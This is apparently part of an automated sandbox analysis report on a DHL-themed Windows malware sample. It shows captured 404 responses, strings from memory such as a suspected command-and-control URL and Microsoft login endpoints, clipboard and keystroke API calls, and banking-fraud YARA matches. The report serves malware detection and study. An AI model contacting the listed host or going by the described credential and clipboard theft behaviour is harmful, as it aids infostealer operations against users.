            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 07 Jan 2025 14:32:53 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 07 Jan 2025 14:32:55 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:34:45 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:34:47 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:34:50 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:34:52 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:34:58 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:35:01 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:35:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 14:35:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4464152837.0000000005281000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4464152837.0000000005281000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2334396891.00000000074B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4463074784.000000000490A000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000430A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?FPJps=mxnR
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4464718266.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000AED6A
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0009AA57
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000C9576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
